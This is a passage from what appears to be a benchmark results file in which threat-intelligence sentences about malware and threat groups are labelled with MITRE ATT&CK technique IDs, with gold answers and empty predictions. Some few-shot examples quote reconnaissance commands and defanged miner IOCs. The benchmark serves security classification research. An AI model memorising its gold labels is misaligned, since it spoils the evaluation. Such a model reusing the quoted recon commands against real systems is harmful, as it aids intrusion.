Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands.\n\t - T1059: Command and Scripting Interpreter\n", + "input": "FELIXROOT opens a remote shell to execute commands on the infected system.", + "gold": "- T1059: Command and Scripting Interpreter", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Regin has used a hidden file system to store some of its components.\n\t - T1564.005: Hide Artifacts - Hidden File System\n- Text: APT32 used NTFS alternate data streams to hide their payloads.\n\t - T1564.004: Hide Artifacts - NTFS File Attributes\n- Text: No matching sample found for T1055.014\n", + "input": "TajMahal has used an encrypted Virtual File System to store plugins.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pandora can monitor processes on a compromised host.\n\t - T1057: Process Discovery\n- Text: It then calls the API EnumWindows() function to enumerate all windows from the victim\u2019s system. Its EnumFunc() callback function collects all windows titles and then adds a 14H long random string prefix. One mixed windows title looks like this: \u201c{14H long random string}+windows title\u201d. All the mixed windows titles are added into a string list box control\n\t - T1010: Application Window Discovery\n- Text: Action RAT can identify AV products on an infected host using the following command: `cmd.exe WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List`.\n\t - T1518.001: Software Discovery - Security Software Discovery\n", + "input": "Final1stspy obtains a list of running processes.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Conficker exploited the MS08-067 Windows vulnerability for remote code execution through a crafted RPC request.\n\t - T1210: Exploitation of Remote Services\n- Text: The ransomware payload is copied to the ADMIN$ share of a remote system, and Impacket is used to remotely invoke an encoded PowerShell command on target systems to execute the payload\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1570: Lateral Tool Transfer\n- Text: copies itself into the public folder of Network Attached Storage (NAS) devices and infects new victims who open the file.\n\t - T1080: Taint Shared Content\n", + "input": "WannaCry uses an exploit in SMBv1 to spread itself to other remote systems on a network.", + "gold": "- T1210: Exploitation of Remote Services", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has used Web shells, often to maintain access to a victim network.\n\t - T1505.003: Server Software Component - Web Shell\n- Text: Leafminer used a tool called MailSniper to search through the Exchange server mailboxes for keywords.\n\t - T1114.002: Email Collection - Remote Email Collection\n- Text: The actors used a variety of public exploits, including CVE 2020-0688 and CVE 2020-17144 to gain privileged remote code execution on vulnerable Microsoft Exchange servers. In some cases, this exploitation occurred after valid credentials were identified by password spray, as these vulnerabilities require authentication as a valid user.\n\t - T1190: Exploit Public-Facing Application\n", + "input": "Magic Hound has used multiple web shells to gain execution.", + "gold": "- T1505.003: Server Software Component - Web Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Prikormka encrypts some C2 traffic with the Blowfish cipher.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: Once it is encrypted using the XOR algorithm, the buffer is encoded with BASE64\n\t - T1027: Obfuscated Files or Information\n- Text: Rising Sun can archive data using RC4 encryption and Base64 encoding prior to exfiltration.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", + "input": "Cardinal RAT uses a secret key with a series of XOR and addition operations to encrypt C2 traffic.", + "gold": "- T1573.001: Encrypted Channel - Symmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Janicab used a cron job for persistence on Mac devices.\n\t - T1053.003: Scheduled Task/Job - Cron\n- Text: adds an entry to the rc.common file for persistence.\n\t - T1037.004: Boot or Logon Initialization Scripts - RC Scripts\n- Text: Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This configuration file contains the same actor pool and wallet information as the first. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. TermsHost.exe\" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample also creates the UPX-packed file \"dDNLQrsBUE.url\" in the Windows Start Menu Folder\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n", + "input": "Rocke has installed an \"init.d\" startup script to maintain persistence.", + "gold": "- T1037: Boot or Logon Initialization Scripts", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: is capable of deleting files on the victim. It also securely removes itself after collecting and exfiltrating data.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: SUNBURST used VBScripts to initiate the execution of payloads.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: Invoke-WmiCommand CodeExecution module uses WMI to execute and retrieve the output from a payload.\n\t - T1047: Windows Management Instrumentation\n", + "input": "Bisonal will delete its dropper and VBS scripts from the victim\u2019s machine.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: These macro injection modules also have the functionality to tamper with the Microsoft Office macro security settings\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: Epic searches for anti-malware services running on the victim\u2019s machine and terminates itself if it finds them.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: MuddyWater has used malware to obtain a list of running processes on the system.\n\t - T1057: Process Discovery\n", + "input": "ThiefQuest uses the function \"kill_unwanted\" to obtain a list of running processes and kills each process matching a list of security related processes.", + "gold": "- T1562.001: Impair Defenses - Disable or Modify Tools", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: collects a list of active and listening connections by using the command netstat -nao as well as a list of available network mappings with net use.\n\t - T1049: System Network Connections Discovery\n- Text: Dragonfly has used batch scripts to enumerate users on a victim domain controller.\n\t - T1087.002: Account Discovery - Domain Account\n- Text: sets a WH_CBT Windows hook to collect information on process creation.\n\t - T1057: Process Discovery\n", + "input": "POWRUNER may collect active network connections by running \"netstat -an\" on a victim.", + "gold": "- T1049: System Network Connections Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sandworm Team has disabled event logging on compromised systems.\n\t - T1562.002: Impair Defenses - Disable Windows Event Logging\n- Text: No matching sample found for T1562.008\n- Text: The server-side component provides a simple graphical user interface for threat actors interacting with web shells\n\t - T1059: Command and Scripting Interpreter\n\t - T1505.003: Server Software Component - Web Shell\n", + "input": "Threat Group-3390 has used appcmd.exe to disable logging on a victim server.", + "gold": "- T1562.002: Impair Defenses - Disable Windows Event Logging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT28 has obtained and used open-source tools like Koadic, Mimikatz, and Responder.\n\t - T1588.002: Obtain Capabilities - Tool\n- Text: Towards the end of July, we observed an intrusion that began with IcedID malware and ended in XingLocker ransomware, a Mountlocker variant. XingLocker made its first appearance in early May of this year. The new group was featured in the AstroLocker ransomware blog, and it has been very active since then.\n\t - T1588.001: Obtain Capabilities - Malware\n- Text: Since the 2016 publication, Microsoft has come across an evolution of PLATINUM\u2019s file-transfer tool, one that uses the Intel\u00ae Active Management Technology (AMT) Serial-over-LAN (SOL) channel for communication\n\t - T1105: Ingress Tool Transfer\n", + "input": "For Operation CuckooBees, the threat actors obtained publicly-available JSP code that was used to deploy a webshell onto a compromised server.", + "gold": "- T1588.002: Obtain Capabilities - Tool", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In the case of Astaroth trojan, the .lnk file contains an argument into WMIC.exe to run in non-interactive mode, which forgoes opening a window that the victim could notice, to download the hardcoded url in the .lnk\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n- Text: A Threat Group-3390 tool can spawn svchost.exe and inject the payload into that process.\n\t - T1055.012: Process Injection - Process Hollowing\n", + "input": "Astaroth's initial payload is a malicious .LNK file.", + "gold": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The malware also contains an embedded .NET wrapper DLL for creating and managing scheduled tasks on Windows systems\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: Over a few days' span, the threat actors install remote access tools on additional systems based upon the results of the network reconnaissance. They use At.exe to schedule tasks to run self-extracting RAR archives, which install either HttpBrowser or PlugX. CTU researchers observed the threat actors collecting Cisco VPN profiles to use when accessing the victim's network via VPN (see Figure 13\n\t - T1053.002: Scheduled Task/Job - At\n\t - T1133: External Remote Services\n- Text: Exaramel for Linux uses crontab for persistence if it does not have root privileges.\n\t - T1053.003: Scheduled Task/Job - Cron\n", + "input": "APT38 has used Task Scheduler to run programs at system startup or on a scheduled basis for persistence.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n\t - T1027: Obfuscated Files or Information\n- Text: Since this malicious extension is trying to pass for a legitimate Chrome plugin, Grandoreiro\u2019s developer named it \u201cGoogle Plugin\u201d version 1.5.0. Visually, it adds a square button to the browser window instead of the \u201ccookie\u201d button on the original plugin\n\t - T1176: Browser Extensions\n- Text: Chinese state-sponsored cyber actors were observed using benign executables which used DLL loadorder hijacking to activate the malware installation process.\n\t - T1564: Hide Artifacts\n", + "input": "Bundlore can change browser security settings to enable extensions to be installed. Bundlore uses the \"pkill cfprefsd\" command to prevent users from inspecting processes.", + "gold": "- T1562.001: Impair Defenses - Disable or Modify Tools", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Imminent Monitor has the capability to run a cryptocurrency miner on the victim machine.\n\t - T1496: Resource Hijacking\n- Text: TeamTNT targets exposed Docker API to deploy malicious images. Docker images containing TeamTNT malware are being hosted in public Docker repos via account takeovers. TeamTNT leverages exposed Docker hub secrets within GitHub to stage malicious Docker images. The following MITRE ATT&CK techniques were observed: Deploy Container (T1610), User Execution: Malicious Image (T1204.003), Unsecured Credentials: Credentials In Files (T1552.002), Implant Internal Image (T1525), and Valid Accounts: Cloud Accounts (T1078.004\n\t - T1204.003: User Execution - Malicious Image\n- Text: Kinsing was run through a deployed Ubuntu container.\n\t - T1610: Deploy Container\n", + "input": "Bonadan can download an additional module which has a cryptocurrency mining extension.", + "gold": "- T1496: Resource Hijacking", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: After having registered the Print Processor, PipeMon restarts the print spooler service (spoolsv.exe). As a result, the malicious print process is loaded when the spooler service starts. Note that the Print Spooler service starts at each PC startup, which ensures persistence across system resets\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: HOPLIGHT has used svchost.exe to execute a malicious DLL .\n\t - T1569.002: System Services - Service Execution\n- Text: QuasarRAT has a command to edit the Registry on the victim\u2019s machine.\n\t - T1112: Modify Registry\n", + "input": "Wiarp creates a backdoor through which remote attackers can create a service.", + "gold": "- T1543.003: Create or Modify System Process - Windows Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In other cases, threat actors placed web shells on externally accessible servers, sometimes behind a reverse proxy, to execute commands on the compromised system\n\t - T1090: Proxy\n\t - T1059: Command and Scripting Interpreter\n\t - T1505.003: Server Software Component - Web Shell\n- Text: Ke3chang has used compromised credentials and a .NET tool to dump data from Microsoft Exchange mailboxes.\n\t - T1114.002: Email Collection - Remote Email Collection\n- Text: Cisco Talos has observed another malware campaign that utilizes malicious Microsoft Office documents (maldocs) to spread the remote access trojan (RAT) ObliqueRAT. ObliqueRAT has been linked to the Transparent Tribe APT group in the past\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "Dragonfly 2.0 commonly created Web shells on victims' publicly accessible email and web servers, which they used to maintain access to a victim network and download additional malicious files.", + "gold": "- T1505.003: Server Software Component - Web Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HELLOKITTY is written in C++, but reimplements a significant portion of DEATHRANSOM's functionality using similar loop operations and thread pooling via QueueUserWorkItem. The code structure to enumerate network resources, logical drives, and perform file encryption is very similar. Additionally, HELLOKITTY and DEATHRANSOM share very similar functions to check for the completion status of their encryption threads before exiting\n\t - T1082: System Information Discovery\n\t - T1135: Network Share Discovery\n- Text: RTM can scan victim drives to look for specific banking software on the machine to determine next actions.\n\t - T1518: Software Discovery\n- Text: has run whoami on a victim.\n\t - T1033: System Owner/User Discovery\n", + "input": "AppleSeed can identify the OS version of a targeted system.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can retrieve OS name/architecture and computer/domain name information from compromised hosts.\n\t - T1082: System Information Discovery\n- Text: Chinese state-sponsored cyber actors used compression and encryption of exfiltration files into RAR archives, and subsequently utilizing cloud storage services for storage.\n\t - T1560: Archive Collected Data\n- Text: But Ryuk isn\u2019t new to us\u2026 we\u2019ve been tracking it for years. More important than just looking at Ryuk ransomware itself, though, is looking at the operators behind it and their tactics, techniques, and procedures (TTPs)\u2014especially those used before they encrypt any data. The operators of Ryuk ransomware are known by different names in the community, including \u201cWIZARD SPIDER,\u201d \u201cUNC1878,\u201d and \u201cTeam9. The malware they use has included TrickBot, Anchor, Bazar, Ryuk, and others\n\t - T1047: Windows Management Instrumentation\n\t - T1018: Remote System Discovery\n", + "input": "TYPEFRAME can gather the disk volume information.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ke3chang performs account discovery using commands such as \"net localgroup administrators\" and \"net group \"REDACTED\" /domain\" on specific permissions groups.\n\t - T1087.001: Account Discovery - Local Account\n\t - T1087.002: Account Discovery - Domain Account\n- Text: RATANKBA runs the \"net view /domain\" and \"net view\" commands.\n\t - T1018: Remote System Discovery\n- Text: Helminth has checked for the domain admin group and Exchange Trusted Subsystem groups using the commands \"net group Exchange Trusted Subsystem /domain\" and \"net group domain admins /domain\".\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n", + "input": "APT29 has used PowerShell to discover domain accounts by executing \"Get-ADUser\" and \"Get-DGroupMember\".", + "gold": "- T1087.002: Account Discovery - Domain Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Windshift has used links embedded in e-mails to lure victims into executing malicious code.\n\t - T1204.001: User Execution - Malicious Link\n- Text: FIN7 lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file.\n\t - T1204.002: User Execution - Malicious File\n- Text: LazyScripter has used spam emails that contain a link that redirects the victim to download a malicious document.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "Molerats has sent malicious links via email trick users into opening a RAR archive and running an executable.", + "gold": "- T1204.001: User Execution - Malicious Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BitPaymer has used RC4-encrypted strings and string hashes to avoid identifiable strings within the binary.\n\t - T1027: Obfuscated Files or Information\n- Text: In the case of a Linux/Ebury backdoor connection, the <version> contains a hexadecimal string of twenty-two (22) characters or more. It embeds an eleven (11) character password that is first encrypted with the client IP address and then encoded as a hexadecimal string; optionally a four (4) byte command may be encrypted and encoded as well after the password\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: FLASHFLOOD employs the same encoding scheme as SPACESHIP for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", + "input": "Kobalos encrypts all strings using RC4 and bundles all functionality into a single function call.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: JPIN can send email over SMTP.\n\t - T1071.003: Application Layer Protocol - Mail Protocols\n- Text: During Night Dragon, threat actors enticed users to click on links in spearphishing emails to download malware.\n\t - T1204.001: User Execution - Malicious Link\n- Text: Transparent Tribe has historically used military and defense-themes in their phishing emails and maldocs to target Indian military and government personnel. Figure 6: Transparent Tribe's spear-phishing email targeting defense personnel. This is in line with previous reporting on Transparent Tribe's use of official COVID-19 applications and content to serve Android malware. Figure 7: Attached malicious XLS macro. Another lure targeted Indian Defense Advisors attached to various Indian embassies in Southeast Asia, as seen in Figure 8\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "Nomadic Octopus as attempted to lure victims into clicking on malicious attachments within spearphishing emails.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The MSIL file contains the packed core payload in its .Net resource section\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: Dragonfly has injected SMB URLs into malicious Word spearphishing attachments to initiate Forced Authentication.\n\t - T1221: Template Injection\n- Text: Actors executed malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths.\n\t - T1129: Shared Modules\n", + "input": "BLINDINGCAN has been packed with the UPX packer.", + "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CORESHELL collects hostname, volume serial number and OS version data from the victim and sends the information to its C2 server.\n\t - T1082: System Information Discovery\n- Text: ZxShell hooks several API functions to spawn system threads.\n\t - T1056.004: Input Capture - Credential API Hooking\n- Text: During C0015, the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts.\n\t - T1482: Domain Trust Discovery\n", + "input": "LightNeuron gathers information about network adapters using the Win32 API call \"GetAdaptersInfo\".", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Crimson can decode its encoded PE file prior to execution.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Kinsing has created and run a Bitcoin cryptocurrency miner.\n\t - T1496: Resource Hijacking\n- Text: ROKRAT can request to delete files.\n\t - T1070.004: Indicator Removal - File Deletion\n", + "input": "Imminent Monitor has decoded malware components that are then dropped to the system.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LookBack can enumerate services on the victim machine.\n\t - T1007: System Service Discovery\n- Text: WMIC is a good tool for managing windows hosts and is widely favored by desktop administrators\n\t - T1047: 